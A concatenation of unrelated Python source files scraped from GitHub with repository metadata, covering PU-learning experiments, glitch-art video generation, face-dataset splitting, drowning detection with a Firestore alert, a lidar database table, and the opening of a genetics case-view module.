len(status_df),
status_df["gen_spectrum"].sum() / len(status_df) * 100,
)
)
status_df.to_csv(os.path.join(output_folder, "status_lammps.csv"))
if __name__ == "__main__":
main()
| rxn4chemistry/rxn-ir-to-structure | scripts/run_md_pipeline.py | run_md_pipeline.py | py | 3,122 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "logging.basicConfig",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "mol_dyn.utils.load_smiles_csv",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "tqdm.tq... |
31525145901 | # -*- coding:utf-8 -*-
import pandas as pd # for data handling
import numpy as np # for random selections, mainly
import matplotlib.pyplot as plt # for plotting
import matplotlib
from sklearn.datasets.samples_generator import make_blobs
from sklearn.tree import DecisionTreeClassifier
from baggingPU import BaggingClassifierPU
from sklearn.ensemble import RandomForestClassifier
matplotlib.rcParams['font.sans-serif'] = ['SimHei'] # 用黑体显示中文
matplotlib.rcParams['axes.unicode_minus'] = False # 正常显示负号
plt.rcParams['figure.figsize'] = 7, 7 # graph dimensions
plt.rcParams['font.size'] = 14 # graph font size
# 0.create datasets of blobs 构建blob是数据集,用于测试PU-Learning不同Approaches的效果
X, y = make_blobs(
n_samples=6000,
centers=[[1, 5], [5, 1], [0, 0], [6, 6]]
)
y = (y > 1).astype(int)
X = pd.DataFrame(X, columns=['feature1', 'feature2'])
y = pd.Series(y)
# Check the contents of the set
print('%d data points and %d features' % X.shape)
print('%d positive out of %d total' % (sum(y), len(y)))
# 0.1 plot the original data set 绘制原始blobs数据集
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c='k', marker='.', linewidths=1, s=10, alpha=0.5,
label='Negative'
)
plt.scatter(
X[y == 1].feature1, X[y == 1].feature2,
c='b', marker='o', linewidth=0, s=50, alpha=0.5,
label='Positive'
)
plt.legend()
plt.title('图1- 原始样本数据')
plt.show()
# 0.2 对标记为1的样本取消其样本label 取消数量为hidden_size=2700
y_orig = y.copy()
hidden_size = 2700
y.loc[
np.random.choice(
y[y == 1].index,
replace=False,
size=hidden_size
)
] = 0
# Check the new contents of the set
print('%d positive out of %d total' % (sum(y), len(y)))
# plot the data set, as model can see it
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c='k', marker='.', linewidths=1, s=10, alpha=0.5,
label='Unlabeled'
)
plt.scatter(
X[y == 1].feature1, X[y == 1].feature2,
c='b', marker='o', linewidth=0, s=50, alpha=0.5,
label='Positive'
)
plt.legend()
plt.title('图-2 设置2700个positive样本 为 Unlabeled样本 ')
plt.show()
# PU-Learning Approaches 对比
# 1.1 standard classifier 标准分类器
# 使用标准分类器对Blobs样本进行分类
forest = RandomForestClassifier(
n_estimators=100,
n_jobs=-1
)
# X 为Blobs的特征数据(共两维)
# y 为Blob数据的标签(已设置2700 positive样本数据集为 unlabeled数据)
forest.fit(X, y)
results = pd.DataFrame({
'truth': y_orig,
'label': y,
'output_std': forest.predict_proba(X)[:, 1]
}, columns=['truth', 'label', 'output_std'])
# 1.2 conclusion of standard classifier 展示`lable==0` 即`unlabeled`的全部数据,查看经过`standard classifier`发现的`positive`的样本
plt.rcParams['figure.figsize'] = 9, 7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_std, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Unlabeled样本的预测分值')
plt.title('Standard Classifier')
plt.show()
# 2.1 Bagging
# - Bagging方法
n_estimators = 1000
estimator = DecisionTreeClassifier()
# iP表示为positive样本的index
iP = y[y > 0].index
# iU表示为 unlabeled样本的index
iU = y[y <= 0].index
# 对于每次的数据迭代,记录数据被OOB的次数
num_oob = pd.DataFrame(np.zeros(shape=y.shape), index=y.index)
# 记录每一轮 OOB data的score
sum_oob = pd.DataFrame(np.zeros(shape=y.shape), index=y.index)
for _ in range(n_estimators):
if _ % 100 == 0:
print("当前迭代次数为:%d" % _)
# Bootstrap 抽取数据 每次抽样unlabeled样本数量与positive样本数量比为1:1
# iB 表示 bagging data的index
iB = np.random.choice(iU, replace=True, size=len(iP))
# out of bag样本的index i_oob(unlabeled samples)
i_oob = list(set(iU) - set(iB))
# 组合 positive样本集 + unlabeled样本集
Xb = X[y > 0].append(X.loc[iB])
yb = y[y > 0].append(y.loc[iB])
# 训练分类器模型
estimator.fit(Xb, yb)
# 迭代过程中循环更新 oob数据的 sum_oob 以及 num_oob
sum_oob.loc[i_oob, 0] += estimator.predict_proba(X.loc[i_oob])[:, 1]
num_oob.loc[i_oob, 0] += 1
# 取sum_oob / num_oob 数据值作为 Bagging方法 对unlabeled数据的learning 结果
results['output_bag'] = sum_oob / num_oob
# 2.2 conclusion - PU-Learning bagging的数据 可视化展示`label=0`即 `unlabeled` 的数据
# 展示unlabeled数据集 在经过Bagging方法后的效果
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_bag, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Unlabeled样本的预测分值')
plt.title('PU Bagging')
plt.show()
# 3.1 Using `BaggingClassifierPU`
bc = BaggingClassifierPU(
DecisionTreeClassifier(),
n_estimators=1000,
max_samples=sum(y),
n_jobs=-1
)
bc.fit(X, y)
results['output_skb'] = bc.oob_decision_function_[:, 1]
# Visualize the approach's result
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_skb, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Scores given to unlabeled points')
plt.title(r'Using ${\tt BaggingClassifierPU}$')
plt.show()
# 4. Using `Two-Step`
# 4.1 Step1 + Step2
# Step1 识别可靠负样本集 RN `Reliable Negative`
# 如果未标注数据 得到score超过全部已知的positive样本数据的score值,则label为positive
# 或者score低于全部已知的positive的score值 ,则label为negative
# Step2 利用 `Positive Samples` 和 `RN`集合组成训练集,训练传统的二分类模型
# 对label进行调整
# `1` 表示为`positive`;
# `-1` 表示为`unlabeled `;
# `0` 表示为实锤`negative`;
ys = 2 * y - 1
# 根据普遍意义的随机森林预测样本数据
pred = forest.predict_proba(X)[:, 1]
# 根据预测结果 判断 positive 数据的概率范围
range_P = [min(pred * (ys > 0)), max(pred * (ys > 0))]
# STEP 1
# 如果未标注数据 得到score超过全部已知的positive样本数据的score值,则label为postive
# 或者score低于全部已知的positive的score值 ,则label为negative
# 新的positive样本
iP_new = ys[(ys < 0) & (pred >= range_P[1])].index
# 新的negative样本
iN_new = ys[(ys < 0) & (pred <= range_P[0])].index
# 实锤unlabeled样本数据的标签
ys.loc[iP_new] = 1
ys.loc[iN_new] = 0
# STEP1通过散点图查看标注的效果
plt.rcParams['figure.figsize'] = 7, 7
cdict = {-1: 'gray', 0: 'darkred', 1: 'blue'}
plt.scatter(
X.feature1, X.feature2,
c=[cdict[k] for k in ys],
linewidths=0, s=20, alpha=0.5
)
plt.title('经过Step-1后样本的标记情况图')
plt.show()
# Classifier to be used for step 2
rf2 = RandomForestClassifier(n_estimators=1000, n_jobs=-1)
# Limit to 10 iterations (this is arbitrary, but
# otherwise this approach can take a very long time)
# 随机设置超参数迭代次数为10次
for i in range(10):
# If step 1 didn't find new labels, we're done
if len(iP_new) + len(iN_new) == 0 and i > 0:
break
print('Step 1 labeled %d new positives and %d new negatives.' % (len(iP_new), len(iN_new)))
print('正在执行Step2,当前迭代次数为%d次' % (i + 1), end=' ')
# STEP 2
# Retrain on new labels and get new scores
rf2.fit(X, ys)
pred = rf2.predict_proba(X)[:, -1]
# Find the range of scores given to positive data points
range_P = [min(pred * (ys > 0)), max(pred * (ys > 0))]
# Repeat step 1
iP_new = ys[(ys < 0) & (pred >= range_P[1])].index
iN_new = ys[(ys < 0) & (pred <= range_P[0])].index
ys.loc[iP_new] = 1
ys.loc[iN_new] = 0
# Lastly, get the scores assigned by this approach
results['output_stp'] = pred
plt.scatter(
X.feature1, X.feature2,
c=[cdict[k] for k in ys],
linewidths=0, s=20, alpha=0.5
)
plt.title('Step-2处理迭代完成后样本的标记情况图')
plt.show()
# 4.2 对Two-Step方法的效果可视化展示
# Visualize this approach's final results
plt.rcParams['figure.figsize']=9,7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_stp, linewidths=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Scored given to unlabeled points')
plt.title('Two-Step method PU Learning')
plt.show()
# 5. 方法比较
# 对于每一个数据,计算3种方法的平均值
results['output_all'] = results[['output_std', 'output_bag', 'output_stp']].mean(axis=1)
# 5.1 可视化三种不同方法的平均效果
plt.rcParams['figure.figsize'] = 9, 7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2, c=results[y==0].output_all, linewidths=0, s=50, alpha=0.5
)
plt.colorbar(label='Unlabeled样本的预测分值')
plt.title('PU-Learning三种不同方法的平均效果')
plt.show()
# 5.2 对于三种不同的PU-Learning的表现可视化展示 -成功识别隐藏positive样本的数量
# 打印经过output_std learning 方法后,排名前十的unlabeled数据的真实label标签
results[results.label==0].sort_values('output_std', ascending=False).head(10).truth
# 将全部hidden_size 按照步长为100设置不同的数量级
ts = range(100, hidden_size, 100)
y_std, y_bag, y_skb, y_stp, y_all = [], [], [], [], []
for t in ts:
# 针对不同的PU-Learning的方法添加
# 对未标注数据的识别的positive分数最高的TOP(100,200,300,....3000) 真正positive样本的平均值
# 方法一: standard classifier
y_std.append(
results[results.label == 0].sort_values(
'output_std', ascending=False
).head(t).truth.mean()
)
# 方法二: Bagging
y_bag.append(
results[results.label == 0].sort_values(
'output_bag', ascending=False
).head(t).truth.mean()
)
# 方法三:BaggingClassifierPU
y_skb.append(
results[results.label == 0].sort_values(
'output_skb', ascending=False
).head(t).truth.mean()
)
# 方法四:TWO-STEP
y_stp.append(
results[results.label == 0].sort_values(
'output_stp', ascending=False
).head(t).truth.mean()
)
# 方法五:方法一、二、四比较的平均值
y_all.append(
results[results.label == 0].sort_values(
'output_all', ascending=False
).head(t).truth.mean()
)
# 比较PU-Bagging和BaggingClassifierPU 的区别
print([y_bag[i] - y_skb[i] for i in range(len(y_bag))])
# - 四种不同的PU-learning的处理方法展示 -- Performance graphing
plt.rcParams['font.size'] = 16
plt.rcParams['figure.figsize'] = 15, 8
plt.plot(
ts, y_std,
ts, y_bag,
ts, y_stp,
ts, y_all,
lw=3
)
vals = plt.gca().get_yticks()
plt.yticks(vals, ['%.0f%%' %(v*100) for v in vals])
plt.xlabel('按照最高分数排序选择的未标注数据量')
plt.ylabel('被选中样本肯定为positive的百分比')
plt.legend([
'Standard classifier',
'PU Bagging',
'Two-Step approach',
'Average score'
])
ylim = plt.gca().get_ylim()
plt.title('三种PU-Learning的方法以及其平均值的表现图')
plt.grid()
plt.show()
| Batman001/pu-learning-demo | PU-Learning-Test-Blob.py | PU-Learning-Test-Blob.py | py | 11,230 | python | zh | code | 2 | github-code | 1 | [
{
"api_name": "matplotlib.rcParams",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 14,
"usage_type": "attribute"
},
{
... |
26914970028 | #!/usr/bin/env python3
import os
import click
import hashlib
import imageio
from .jpeg import *
import subprocess as sp
from pathlib import Path
from contextlib import suppress
from multiprocessing import cpu_count
import concurrent.futures
cache_dir = Path.home() / '.cache/glitch-art-display'
cache_dir.mkdir(exist_ok=True)
frame_timings = [5, 4, 3, 2, 2, 1, 1, 1, 1]
def is_cached(filename):
if (cache_dir / filename).is_file():
return True
return False
def find_images(directory):
valid_suffixes = ['.jpg', '.jpeg']
convert_suffixes = ['.png']
for root,dirs,files in os.walk(directory):
for file in files:
filename = Path(root) / file
# if image is a JPEG
if any([filename.suffix.lower().endswith(s) for s in valid_suffixes]):
yield filename
# if image is an unsupported image type
elif any([filename.suffix.lower().endswith(s) for s in convert_suffixes]):
# try to convert it with imagemagick
try:
new_filename = cache_dir / (filename.stem + '.jpg')
sp.run(['convert', str(filename), str(new_filename)], check=True)
yield new_filename
except (FileNotFoundError, sp.CalledProcessError) as e:
print(f'[!] Unsupported file: {filename.name}')
print(f'[!] - please install imagemagick in order to use {filename.suffix} files')
def gen_frames(image_dir, output, glitch_amount=100, fps=25, num_image_frames=25, num_transition_frames=30, shuffle=False):
frame_groups = []
frames_output = Path(output).resolve()
frames_output.parent.mkdir(parents=True, exist_ok=True)
frame_number = 0
transition_frames = int(num_transition_frames/2)
found_images = list(find_images(image_dir))
if shuffle:
random.shuffle(found_images)
with concurrent.futures.ThreadPoolExecutor(max_workers=cpu_count()) as pool:
for image in found_images:
try:
print(f'[+] Generating frames for {image.name}')
glitched_frames = []
image_bytes = bytearray(image.read_bytes())
image_hash = hashlib.md5(image_bytes).hexdigest()
png_filename = cache_dir / f'{image_hash}.png'
if not png_filename.exists():
pool.submit(sp.run, ['convert', str(image), str(png_filename)], check=True)
# generate glitch frames
glitched_futures = []
for i in range(transition_frames):
amount = int(glitch_amount * ((i+1)/transition_frames))
glitched_futures.append(pool.submit(glitch, image, amount, i))
concurrent.futures.wait(glitched_futures)
for glitched_future in glitched_futures:
glitched_frame = glitched_future.result()
if glitched_frame:
glitched_frames.append(glitched_frame)
except KeyboardInterrupt:
pool.shutdown(wait=False, cancel_futures=True)
raise
glitch_in = []
random.shuffle(frame_timings)
for i, glitched_image in enumerate(glitched_frames[::-1]):
glitch_group = []
for j in range(frame_timings[i % len(frame_timings)]):
glitch_group.append(glitched_image)
glitch_in.append(glitch_group)
normal = []
for i in range(num_image_frames):
normal.append(png_filename)
glitch_out = []
random.shuffle(frame_timings)
for i, glitched_image in enumerate(glitched_frames):
glitch_group = []
for j in range(frame_timings[i % len(frame_timings)]):
glitch_group.append(glitched_image)
glitch_out.append(glitch_group)
frame_groups.append([glitch_in, normal, glitch_out])
frames = []
interlace_frames = max(2, min(int(transition_frames/4), 1))
for i, [glitch_in, normal, glitch_out] in enumerate(frame_groups):
for g in glitch_in:
frames += g
frames += normal
if i == len(frame_groups)-1:
for g in glitch_out:
frames += g
else:
# truncate end of this glitch group
glitch_out, glitch_interlaced = glitch_out[:-interlace_frames], glitch_out[-interlace_frames:]
# truncate beginning of next glitch group
frame_groups[i+1][0], glitch_next_interlaced = frame_groups[i+1][0][interlace_frames:], frame_groups[i+1][0][:interlace_frames]
for g in glitch_out:
frames += g
for i in range(min(interlace_frames, len(glitch_interlaced))):
frames += glitch_next_interlaced[i]
frames += glitch_interlaced[i]
w = imageio.get_writer(str(frames_output), format='FFMPEG', mode='I', fps=fps, macro_block_size=1)
try:
prev_frame = ''
for i, frame in enumerate(frames):
print(f'\r[+] Rendering frame {i:,}/{len(frames):,} ({i/len(frames)*100:.1f}%)', end='')
frame = str(frame)
if frame != prev_frame:
try:
read_frame = imageio.imread(frame, pilmode='RGB')
except Exception as e:
print(f'[!] Error reading {frame}: {e}')
continue
try:
w.append_data(read_frame)
except ValueError:
print(f'[!] {frame}')
raise
prev_frame = str(frame)
finally:
with suppress(Exception):
w.close()
print(f'[+] Video saved to {frames_output}')
def glitch(image, amount=None, sequence=''):
print(f'[+] Glitching {image.name} by {amount}')
if amount is None:
amount = random.randint(0,99)
else:
amount = max(0, min(99, int(amount)-1))
image = Path(image)
image_bytes = bytearray(image.read_bytes())
image_hash = hashlib.md5(image_bytes).hexdigest()
try:
jpeg = Jpeg(image_bytes)
except JpegError as e:
print(f'[!] {e}')
return
jpeg_filename = cache_dir / f'{image_hash}_{amount}_{sequence}.jpg'
png_filename = cache_dir / f'{image_hash}_{amount}_{sequence}.png'
print(f'[+] Glitching {image.name} by {amount}')
# checked for cached files
if is_cached(png_filename):
print(f'[+] Found cached frame for {png_filename}')
else:
while 1:
try:
jpeg.amount = amount
jpeg.seed = random.randint(0,99)
jpeg.iterations = max(0, min(115, int(amount*1.15)))
# create a new image if not cached
jpeg.save_image(jpeg_filename)
try:
sp.run(['convert', str(jpeg_filename), str(png_filename)], check=True)
break
except Exception:
continue
except JpegError as e:
print(f'[!] {e}')
continue
return png_filename
def main():
@click.command(context_settings={'show_default': True})
@click.argument('input', required=True, type=click.Path(exists=True, file_okay=False, dir_okay=True))
@click.argument('output', required=True, type=click.Path(dir_okay=False))
@click.option('--amount', default=50, type=click.IntRange(1, 100, clamp=True), help='Glitch amount')
@click.option('--fps', default=25, type=float, help='Frames per second')
@click.option('--normal-frames', default=25*25, type=int, help='Number of normal frames')
@click.option('--transition-frames', default=30, type=int, help='Number of glitchy transition frames')
@click.option('--dont-shuffle', is_flag=True, help='Don\'t shuffle order of images')
def go(input, output, amount, fps, normal_frames, transition_frames, dont_shuffle):
gen_frames(input, output, amount, fps, normal_frames, transition_frames, not dont_shuffle)
try:
go()
except KeyboardInterrupt:
print("Interrupted")
if __name__ == '__main__':
main() | TheTechromancer/glitch-art-display | glitch_art_display/main.py | main.py | py | 8,331 | python | en | code | 12 | github-code | 1 | [
{
"api_name": "pathlib.Path.home",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.walk",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_numbe... |
70873192355 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from os import listdir,path,curdir
from os.path import isfile, join
import re
import shutil
import pandas as pd
from sklearn.model_selection import train_test_split
import csv
import random
root = "/data01/ML/dataset/FACE_CLASSIFIER"
face_image_path = "/data01/ML/dataset/FACE_CLASSIFIER/CelebA2/CelebA/Img/img_celeba/img_celeba/img_celeba"
objects_image_path = "/data01/ML/dataset/FACE_CLASSIFIER/256_ObjectCategories_modified"
face_image_path2 = "/data01/ML/dataset/FACE_CLASSIFIER/Borderline"
def get_faces(balanced, face_image_path, face_image_path2):
filenames = []
classification = []
files = [f for f in listdir(face_image_path) if
isfile(join(face_image_path, f))]
files = random.sample(files, balanced-600)
for f in files:
filenames.append(face_image_path + "/" + f)
classification.append(1)
files2 = [f for f in listdir(face_image_path2) if
isfile(join(face_image_path2, f))]
files2 = random.sample(files2, 600)
for f in files2:
filenames.append(face_image_path2 + "/" + f)
classification.append(1)
return filenames, classification
def get_balanced_data_from_classes(min,objects_main_folder):
filenames = []
classification = []
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
files = random.sample(files, min)
for f in files:
filenames.append(objects_main_folder+"/"+dir_+"/"+f)
classification.append(0)
return filenames, classification
def get_not_balanced_data_from_classes(objects_main_folder):
filenames = []
classification = []
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
for f in files:
filenames.append(objects_main_folder + "/" + dir_ + "/" + f)
classification.append(0)
return filenames, classification
def count_min_in_objects_types(objects_main_folder):
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
min_f_numbers = 1000000
max_f_numbers = 0
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder+"/"+dir_) if isfile(join(objects_main_folder+"/"+dir_, f))]
if len(files)< min_f_numbers:
min_f_numbers = len(files)
if len(files) > max_f_numbers:
max_f_numbers = len(files)
return min_f_numbers
def get_min_between_celeba_and_objects(objects_main_folder, celeba_images_folder):
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
count_objects = 0
count_faces = 0
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
count_objects = count_objects + len(files)
files_Faces = [f for f in listdir(celeba_images_folder) if
isfile(join(celeba_images_folder, f))]
count_faces = count_faces + len(files_Faces)
print(count_faces, count_objects)
return count_faces if count_faces < count_objects else count_objects
def write_csv(category, non_faces, faces):
with open("./dataset/" + category+".csv" , mode='w', newline='') as file:
file = csv.writer(file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
file.writerow(['image_path', 'face'])
for el in non_faces:
file.writerow([el[0], el[1]])
for el in faces:
file.writerow([el[0], el[1]])
if __name__ == '__main__':
#min = count_min_in_objects_types(objects_image_path)
#non_faces = get_balanced_data_from_classes(min,objects_image_path)
min = get_min_between_celeba_and_objects(objects_image_path, face_image_path)
non_faces = get_not_balanced_data_from_classes(objects_image_path)
print(len(non_faces[0]))
#print(non_faces[1])
non_faces_x_train, non_faces_x_test, non_faces_y_train, non_faces_y_test = train_test_split(non_faces[0], non_faces[1], test_size = 0.15,shuffle=True)
non_faces_x_train, non_faces_x_val, non_faces_y_train, non_faces_y_val = train_test_split(non_faces_x_train, non_faces_y_train, test_size= 0.15,shuffle=True)
print(len(non_faces_x_train),len(non_faces_x_val), len(non_faces_x_test))
#for el in zip(non_faces_x_train, non_faces_y_train):
# print(el)
faces = get_faces(len(non_faces[0]), face_image_path, face_image_path2)
print(len(faces[0]))
#print(faces[1])
faces_x_train, faces_x_test, faces_y_train, faces_y_test = train_test_split(faces[0],faces[1],test_size=0.15,shuffle=True)
faces_x_train, faces_x_val, faces_y_train, faces_y_val = train_test_split(faces_x_train,faces_y_train,
test_size=0.15,shuffle=True)
print(len(non_faces_x_train), len(non_faces_x_val), len(non_faces_x_test))
#Define true dataset
non_faces_train, faces_train = zip(non_faces_x_train,non_faces_y_train),zip(faces_x_train,faces_y_train)
non_faces_val, faces_val = zip(non_faces_x_val,non_faces_y_val),zip(faces_x_val,faces_y_val)
non_faces_test, faces_test = zip(non_faces_x_test,non_faces_y_test),zip(faces_x_test,faces_y_test)
for tuple in [("train3", non_faces_train,faces_train),("val3",non_faces_val,faces_val),("test3", non_faces_test,faces_test)]:
print("Writing:", tuple[0])
write_csv(tuple[0],tuple[1],tuple[2])
# with open('C:/Users/Lorenzo/Desktop/Università/Machine_learning_project/dataset/FACE_CLASSIFIER/dataset.csv' , mode='w', newline='') as file:
# file = csv.writer(file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# file.writerow(['image_path', 'face'])
# for el in non_faces:
# file.writerow([el[0], el[1]])
# for el in faces:
# file.writerow([el[0], el[1]])
| lorenzo-stacchio/You-Only-Crop-Faces | support_scripts/balance_dataset_face_classifier.py | balance_dataset_face_classifier.py | py | 6,301 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path.isfile",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_numb... |
12046323109 | import sklearn
import joblib
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import albumentations
from torch.utils.data import Dataset, DataLoader
from PIL import Image
import time
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
cred = credentials.Certificate("pooleye-68d49-firebase-adminsdk-zkgaj-4f20e306ba.json")
firebase_admin.initialize_app(cred)
from playsound import playsound
import warnings
warnings.filterwarnings("ignore")
lb = joblib.load('lb.pkl')
class CustomCNN(nn.Module):
def __init__(self):
super(CustomCNN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 5)
self.conv2 = nn.Conv2d(16, 32, 5)
self.conv3 = nn.Conv2d(32, 64, 3)
self.conv4 = nn.Conv2d(64, 128, 5)
self.fc1 = nn.Linear(128, 256)
self.fc2 = nn.Linear(256, len(lb.classes_))
self.pool = nn.MaxPool2d(2, 2)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = self.pool(F.relu(self.conv4(x)))
bs, _, _, _ = x.shape
x = F.adaptive_avg_pool2d(x, 1).reshape(bs, -1)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
print('Loading model and label binarizer...')
lb = joblib.load('lb.pkl')
model = CustomCNN().cuda()
print('Model Loaded...')
model.load_state_dict(torch.load('model.pth'))
print('Loaded model state_dict...')
aug = albumentations.Compose([
albumentations.Resize(224, 224),
])
class detection:
countDrowning=0
ThersholdForDrowning = 30;
fram=0
def detectDrowning(self):
#input from the camera
cap = cv2.VideoCapture(0)
if (cap.isOpened() == False):
print('Error while trying to read video')
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
while(cap.isOpened()):
start_time = time.time()
ret, frame = cap.read()
if ret == True:
model.eval()
with torch.no_grad():
pil_image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
pil_image = aug(image=np.array(pil_image))['image']
if self.fram == 500:
break
self.fram+=1
pil_image = np.transpose(pil_image, (2, 0, 1)).astype(np.float32)
pil_image = torch.tensor(pil_image, dtype=torch.float).cuda()
pil_image = pil_image.unsqueeze(0)
outputs = model(pil_image)
_, preds = torch.max(outputs.data, 1)
self.calculateDrowning(lb.classes_[preds])
print("Frame classified as: ",lb.classes_[preds])
else:
break
print("FPS: ", int(1 / (time.time() - start_time)))
#print(self.countDrowning)
return 0
def calculateDrowning(self,classClassified):
if classClassified == 'drowning':
self.countDrowning +=1;
if self.countDrowning >= self.ThersholdForDrowning:
playsound('alarm.mp3')
self.alertDrowning()
self.countDrowning = 0;
else:
self.countDrowning = 0;
def alertDrowning(self):
organizationId = "25771623413315686"
sent = False
text = "drowning alert"
db = firestore.client()
collectionBane = db.collection("lifeguardnotifications").add({
"orgID": organizationId,
"sent": sent,
"text": text,
"sentTO":"lifeguard"
})
d = detection()
d.detectDrowning()
| Abdelazizmuhmd/drowning-detection | projectjetson/jetson.py | jetson.py | py | 3,581 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "firebase_admin.credentials.Certificate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "firebase_admin.credentials",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "firebase_admin.initialize_app",
"line_number": 16,
"usage_type": "call"... |
12000905328 | # -*- coding: utf-8 -*-
"""Classes for lidar ratio related db tables"""
from ELDAmwl.database.tables.db_base import Base
from sqlalchemy import Column
from sqlalchemy import DECIMAL
from sqlalchemy import INTEGER
from sqlalchemy import text
class ExtBscOption(Base):
"""content of the db table ext_bsc_options
"""
__tablename__ = 'ext_bsc_options'
ID = Column(
INTEGER,
primary_key=True,
)
product_id = Column(
'_product_ID',
INTEGER,
nullable=False,
server_default=text("'-1'"),
)
extinction_options_product_id = Column(
'_extinction_options_product_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
raman_backscatter_options_product_id = Column(
'_raman_backscatter_options_product_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
error_method_id = Column(
'_error_method_ID',
INTEGER,
nullable=False,
index=True,
server_default=text("'-1'"),
)
min_BscRatio_for_LR = Column(
DECIMAL(10, 4),
nullable=False,
server_default=text("'1.0000'"),
)
| actris-scc/ELDAmwl | ELDAmwl/database/tables/lidar_ratio.py | lidar_ratio.py | py | 1,249 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "ELDAmwl.database.tables.db_base.Base",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.INTEGER",
"line_number": 19,
"usage_type": "argument"
},
{
"api... |
4851164907 | # -*- coding: utf-8 -*-
import itertools
from flask import url_for
from flask_mail import Message
import query_phenomizer
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS)
from scout.models.event import VERBS_MAP
from scout.server.utils import institute_and_case
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}
SEX_MAP = {'1': 'male', '2': 'female'}
PHENOTYPE_MAP = {-9: 'missing', 0: 'missing', 1: 'unaffected', 2: 'affected'}
def cases(store, case_query):
"""Preprocess case objects."""
case_groups = {status: [] for status in CASE_STATUSES}
for case_obj in case_query:
analysis_types = set(ind['analysis_type'] for ind in case_obj['individuals'])
case_obj['analysis_types'] = list(analysis_types)
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
case_groups[case_obj['status']].append(case_obj)
data = {
'prio_cases': case_groups['prioritized'],
'cases': [(status, case_groups[status]) for status in CASE_STATUSES[1:]],
'found_cases': case_query.count(),
}
return data
def case(store, institute_obj, case_obj):
"""Preprocess a single case."""
for individual in case_obj['individuals']:
individual['sex_human'] = SEX_MAP.get(individual['sex'], 'unknown')
individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])
case_obj['assignees'] = [store.user(user_email) for user_email in
case_obj.get('assignees', [])]
suspects = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('suspects', [])]
causatives = [store.variant(variant_id) or variant_id for variant_id in
case_obj.get('causatives', [])]
distinct_genes = set()
case_obj['panel_names'] = []
for panel_info in case_obj.get('panels', []):
if panel_info.get('is_default'):
panel_obj = store.panel(panel_info['panel_id'])
distinct_genes.update([gene['hgnc_id'] for gene in panel_obj['genes']])
full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
case_obj['panel_names'].append(full_name)
case_obj['default_genes'] = list(distinct_genes)
for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
case_obj.get('phenotype_terms', [])):
hpo_term['hpo_link'] = ("http://compbio.charite.de/hpoweb/showterm?id={}"
.format(hpo_term['phenotype_id']))
# other collaborators than the owner of the case
case_obj['o_collaborators'] = [collab_id for collab_id in
case_obj['collaborators'] if
collab_id != case_obj['owner']]
irrelevant_ids = ('cust000', institute_obj['_id'])
collab_ids = [collab['_id'] for collab in store.institutes() if
